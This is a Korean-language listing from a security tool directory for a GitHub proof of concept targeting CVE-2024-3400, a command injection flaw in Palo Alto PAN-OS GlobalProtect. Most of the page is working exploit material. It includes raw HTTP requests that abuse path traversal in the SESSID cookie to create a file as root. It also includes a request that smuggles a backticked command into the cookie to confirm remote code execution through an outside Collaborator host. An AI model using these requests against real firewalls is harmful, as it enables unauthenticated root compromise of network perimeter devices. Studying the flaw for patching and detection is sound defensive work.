Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-3400 — CVE-2024-3400 PAN-OS: GlobalProtect의 OS 명령 삽입 취약점 | Kitploit
도구/GitHubGitHub/ihebski/cve-2024-3400
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubihebski/cve-2024-3400

CVE-2024-3400

CVE-2024-3400 PAN-OS: GlobalProtect의 OS 명령 삽입 취약점

저장소 보기
3452년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-3400

CVE-2024-3400 Palo Alto OS 명령 삽입

벤더 설명

Palo Alto Networks PAN-OS 소프트웨어의 GlobalProtect 기능에서 특정 PAN-OS 버전 및 특정 기능 구성에 대한 명령 삽입 취약점으로 인해 인증되지 않은 공격자가 방화벽에서 루트 권한으로 임의 코드를 실행할 수 있습니다.

익스플로잇

감사합니다 watchtowr labs 🚀

경로 탐색 / 확인

HTTP 요청:

root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

poc.txt는 이 경로 /var/appweb/sslvpndocs/global-protect/portal/images/poc.tx 아래에 루트 권한으로 생성되어야 합니다.

취약한 경우 poc.txt에 접근할 때 404 대신 403을 받게 됩니다.

root@kitploit:~

GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close

RCE 확인

원격 측정이 활성화되어 있어야 합니다.

RCE 확인을 위해 Burp Collaborator를 사용할 수 있습니다.

root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

참고 자료

  • https://security.paloaltonetworks.com/CVE-2024-3400
  • https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
  • https://github.com/h4x0r-dz/CVE-2024-3400
도구 다운로드